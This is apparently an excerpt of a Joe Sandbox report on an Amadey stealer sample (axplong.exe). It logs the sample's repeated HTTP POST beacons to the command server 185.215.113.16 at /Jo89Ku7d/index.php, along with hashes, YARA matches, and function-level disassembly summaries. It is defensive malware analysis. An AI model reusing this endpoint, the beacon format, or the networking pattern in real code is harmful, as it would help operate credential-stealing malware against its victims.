Sep 26, 2024 15:43:05.485574007 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:43:05 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.6	52377	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:43:05.599240065 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:43:06.310586929 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:43:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.6	52378	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:43:06.320991993 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:43:07.055228949 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:43:06 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.6	52379	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:43:07.180129051 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:43:07.908143044 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:43:07 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.6	52380	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:43:07.917090893 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:43:08.688188076 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:43:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
59	192.168.2.6	52381	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:43:08.809166908 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:43:09.506697893 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:43:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0
Sep 26, 2024 15:43:09.509749889 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:43:09.860450029 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:43:09 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
60	192.168.2.6	52382	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:43:09.989684105 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:43:10.696933985 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:43:10 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
61	192.168.2.6	52383	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:43:10.706916094 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:43:11.436655045 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:43:11 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.6	52384	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:43:11.560424089 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:43:12.329565048 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:43:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.6	52385	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:43:12.338247061 CEST	314	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 160 Cache-Control: no-cache Data Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 39 32 41 38 43 41 39 46 30 45 45 32 36 46 38 41 45 46 42 42 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 44 46 38 41 30 34 36 43 45 46 41 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20AD92A8CA9F0EE26F8AEFBB24578B4B5647A288E7F81008DA96AE6CDF8A046CEFAFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
Sep 26, 2024 15:43:13.036628962 CEST	196	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:43:12 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 37 0d 0a 20 3c 63 3e 3c 64 3e 0d 0a 30 0d 0a 0d 0a Data Ascii: 7 <c><d>0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.6	52386	185.215.113.16	80	6392	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe

Timestamp	Bytes transferred	Direction	Data
Sep 26, 2024 15:43:13.146893024 CEST	156	OUT	POST /Jo89Ku7d/index.php HTTP/1.1 Content-Type: application/x-www-form-urlencoded Host: 185.215.113.16 Content-Length: 4 Cache-Control: no-cache Data Raw: 73 74 3d 73 Data Ascii: st=s
Sep 26, 2024 15:43:13.868077993 CEST	219	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 26 Sep 2024 13:43:13 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Refresh: 0; url = Login.php Data Raw: 31 0d 0a 20 0d 0a 30 0d 0a 0d 0a Data Ascii: 1 0

Target ID:	0
Start time:	09:41:07
Start date:	26/09/2024
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\file.exe"
Imagebase:	0xa40000
File size:	1'943'552 bytes
MD5 hash:	CC58B885AC20A4B1CDC8E9174A6E8703
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000002.2268543897.0000000000A41000.00000040.00000001.01000000.00000003.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000000.00000003.2181826515.0000000005330000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	09:41:13
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe"
Imagebase:	0x260000
File size:	1'943'552 bytes
MD5 hash:	CC58B885AC20A4B1CDC8E9174A6E8703
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000003.2237964071.0000000004EB0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000002.00000002.2278205377.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 53%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	09:41:14
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0x260000
File size:	1'943'552 bytes
MD5 hash:	CC58B885AC20A4B1CDC8E9174A6E8703
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000002.2295538512.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000003.00000003.2255300359.00000000051C0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	8
Start time:	09:42:00
Start date:	26/09/2024
Path:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\44111dbc49\axplong.exe
Imagebase:	0x260000
File size:	1'943'552 bytes
MD5 hash:	CC58B885AC20A4B1CDC8E9174A6E8703
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Author: Joe Security Rule: JoeSecurity_Amadey_2, Description: Yara detected Amadey\'s stealer DLL, Source: 00000008.00000003.2706394486.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Function 05540170 Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2273745469.0000000005540000.00000040.00001000.00020000.00000000.sdmp, Offset: 05540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5540000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c44a6659d4d1395607c5014c5b3449cacd489593210fee0abe69bb5dc7947cea
Instruction ID: c587d3ec71c0afbff1ec522cf3856e3e87627a417af62bac6a720b33266638e1
Opcode Fuzzy Hash: c44a6659d4d1395607c5014c5b3449cacd489593210fee0abe69bb5dc7947cea
Instruction Fuzzy Hash: 3AF067B210C120AFA141C181AF18AB767AEF6C57387308C26F643CF1E0E36859446CB1

Function 05540179 Relevance: .0, Instructions: 48COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2273745469.0000000005540000.00000040.00001000.00020000.00000000.sdmp, Offset: 05540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5540000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f292502a51a4aea49d191cd63122b3cff458a5353e1e5e68f851f2d0c4af16ac
Instruction ID: 947215055901046077988ec2a0d30a42b45c829fa14b191b51cfb2e8b31a18e4
Opcode Fuzzy Hash: f292502a51a4aea49d191cd63122b3cff458a5353e1e5e68f851f2d0c4af16ac
Instruction Fuzzy Hash: F9F0B47210D120AFA141C581EF186B73BA6E6C57347308C23F243CF1E0D65459456CA1

Function 0554018F Relevance: .0, Instructions: 42COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2273745469.0000000005540000.00000040.00001000.00020000.00000000.sdmp, Offset: 05540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5540000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4cace121990eb7a290ee589c759e6f1db9357a9c6a7166277b7e30acc214ec41
Instruction ID: 0c4c592f948f31a265b498668cf5b174d33052cdca497ecf96c528098cae63e6
Opcode Fuzzy Hash: 4cace121990eb7a290ee589c759e6f1db9357a9c6a7166277b7e30acc214ec41
Instruction Fuzzy Hash: B2F0E2B250C120EFA201D595DA8867B77A7BBC22747308C2AF143CF1E1E7659C80ADA1

Function 055401A1 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2273745469.0000000005540000.00000040.00001000.00020000.00000000.sdmp, Offset: 05540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5540000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3dcb3cf2c8cc8ee6fec20023bb56b6109f57bfe89a9d32f858b3753c2b30d541
Instruction ID: 03d230e9c9faa7e13fe858f61c4b6c502d1056eb7676eaacb6abeed3e47fda11
Opcode Fuzzy Hash: 3dcb3cf2c8cc8ee6fec20023bb56b6109f57bfe89a9d32f858b3753c2b30d541
Instruction Fuzzy Hash: 6AE02BB200C120DFA241C0D1D74C5373BA7B6962787308C32F143CF1D0D6549C416CA1

Function 055401BF Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2273745469.0000000005540000.00000040.00001000.00020000.00000000.sdmp, Offset: 05540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5540000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e843e062887974e5271015d6900f822c270d096d273f2d80842aa414634608f1
Instruction ID: d76efb93da90e3d2793415e9f8797687b59a0affc012ac5903c5ed9399771e81
Opcode Fuzzy Hash: e843e062887974e5271015d6900f822c270d096d273f2d80842aa414634608f1
Instruction Fuzzy Hash: 87E0D8B200D120EF5142C5C1D7186B73BA7BBD62347708C27F247CF5E0D6641840ACA1

Function 05540231 Relevance: .0, Instructions: 31COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2273745469.0000000005540000.00000040.00001000.00020000.00000000.sdmp, Offset: 05540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5540000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3adb4d063161cce60e3b95e7fdc9baa1198c1a8a80f68812dabd138aa825799
Instruction ID: 7c0467f46266a1676eba5f6ecbf4da1f42e991e6b385b4a10d7124bd9e91ccbb
Opcode Fuzzy Hash: e3adb4d063161cce60e3b95e7fdc9baa1198c1a8a80f68812dabd138aa825799
Instruction Fuzzy Hash: 8AE068B200C210DFE291C4C0D28CBB73BAABB873387304C2BF2438E1D1D399248999A1

Function 055401D9 Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2273745469.0000000005540000.00000040.00001000.00020000.00000000.sdmp, Offset: 05540000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5540000_file.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 84f74594d79bf8666bffd0e7177b39a99bda7c1e3dd77db932f5def8a2972617
Instruction ID: fb81c2005106e18a14c7f71ae02ea4257ce99a91d74764dd7cc5659516c99583
Opcode Fuzzy Hash: 84f74594d79bf8666bffd0e7177b39a99bda7c1e3dd77db932f5def8a2972617
Instruction Fuzzy Hash: 8FE026F200C120EFB145C4C1E60DAB337AAF6A23383304C0AF1438E1D1C66828406871

Analysis Process: axplong.exePID: 6392, Parent PID: 1064COMMON

Execution Graph

Execution Coverage:	5.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	4.8%
Total number of Nodes:	609
Total number of Limit Nodes:	42

Executed Functions

Function 0026BD60 Relevance: 21.3, APIs: 5, Strings: 7, Instructions: 310
networkfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InternetOpenW.WININET(002B8D70,00000000,00000000,00000000,00000000), ref: 0026BDED
InternetConnectA.WININET(00000000,?,00000050,00000000,00000000,00000003,00000000,00000001), ref: 0026BE11
HttpOpenRequestA.WININET(?,00000000), ref: 0026BE5B
HttpSendRequestA.WININET(?,00000000), ref: 0026BF1B
InternetReadFile.WININET(?,?,000003FF,?), ref: 0026BFCD
InternetCloseHandle.WININET(?), ref: 0026C0A7
InternetCloseHandle.WININET(?), ref: 0026C0AF
InternetCloseHandle.WININET(?), ref: 0026C0B7

Strings

RHYTYv==, xrefs: 0026BE33
8KG0fymoFx==, xrefs: 0026C2EB, 0026C543
d4,, xrefs: 0026E2FF
stoi argument out of range, xrefs: 0026E3FA
8KG0fCKZFzY=, xrefs: 0026C385
invalid stoi argument, xrefs: 0026E404
RpKt, xrefs: 0026D516

Memory Dump Source

Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: Internet$CloseHandle$HttpOpenRequest$ConnectFileReadSend
String ID: 8KG0fCKZFzY=$8KG0fymoFx==$RHYTYv==$RpKt$d4,$invalid stoi argument$stoi argument out of range
API String ID: 688256393-3871744267
Opcode ID: 61b98ebf9bb271cca72b8e9d5a4c464940b2129bb05e119b54fef2e33e28a7a2
Instruction ID: f9accafffb472b36006baab5cb7621f2ae85e8ff8079855a5c5a778caf24992b
Opcode Fuzzy Hash: 61b98ebf9bb271cca72b8e9d5a4c464940b2129bb05e119b54fef2e33e28a7a2
Instruction Fuzzy Hash: E9B1F8B15201189BEB24DF28CC84BEEBB79EF45304F6081A9F90897291D7719ED4CF95

Function 002746C0 Relevance: 37.0, APIs: 1, Strings: 22, Instructions: 2484COMMON

Download Yara Rule

Strings

9526, xrefs: 0027531D
6F9fr==, xrefs: 00274712
WJP6, xrefs: 002753A3
8ZF6, xrefs: 00275502
V0N6, xrefs: 0027537A
9KN6, xrefs: 00275351
5F6, xrefs: 00275497
Fz==, xrefs: 00274D2D
KFT0PL==, xrefs: 002754B9
Vp 6, xrefs: 00275447
MJB+, xrefs: 00274776, 002747ED, 00274A95, 00274B0C
V0x6, xrefs: 0027541E
fed3aa, xrefs: 00275489
JB6, xrefs: 002753F5
-,, xrefs: 00274F3A
96B6, xrefs: 00275470
246122658369, xrefs: 00274F4D, 00274F8F, 00274F99, 002754F4
stoi argument out of range, xrefs: 00274EAC
MJF+, xrefs: 002747BD, 002748EC, 00274ADC, 00274C0B
mP=, xrefs: 00276383, 00276652
aqB6, xrefs: 002754DB
aZT6, xrefs: 002753CC

Memory Dump Source

Source File: 00000008.00000002.3422539297.0000000000261000.00000040.00000001.01000000.00000007.sdmp, Offset: 00260000, based on PE: true

Associated: 00000008.00000002.3422442492.0000000000260000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3422539297.00000000002C2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424057386.00000000002C9000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.00000000002CB000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000450000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000542000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.000000000056F000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000576000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3424182389.0000000000585000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3427748764.0000000000586000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428182243.000000000072D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000008.00000002.3428258903.000000000072F000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_8_2_260000_axplong.jbxd

Yara matches

Similarity

API ID: InternetOpen$Cnd_destroy_in_situCnd_unregister_at_thread_exitConnectHttpMtx_destroy_in_situRequest
String ID: 5F6$ 6F9fr==$ JB6$ mP=$246122658369$8ZF6$9526$96B6$9KN6$Fz==$KFT0PL==$MJB+$MJF+$V0N6$V0x6$Vp 6$WJP6$aZT6$aqB6$fed3aa$stoi argument out of range$-,
API String ID: 3545240790-1323897623
Opcode ID: aa3a23d88058151b3851dc18e7028cbed4555133c3eb8677bd325764034f70e3
Instruction ID: 8c29c6e9a7b4e5fd9caa2cd7b9a343ddaaacd4ccc7ad27d79f2aab05953d45e8
Opcode Fuzzy Hash: aa3a23d88058151b3851dc18e7028cbed4555133c3eb8677bd325764034f70e3
Instruction Fuzzy Hash: FF231471A201588BEB19DB28CD8979DBB769F81304F54C1D8E00CA72C6EB755FA4CF91

Function 00265DF0 Relevance: 12.6, APIs: 2, Strings: 5, Instructions: 364
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

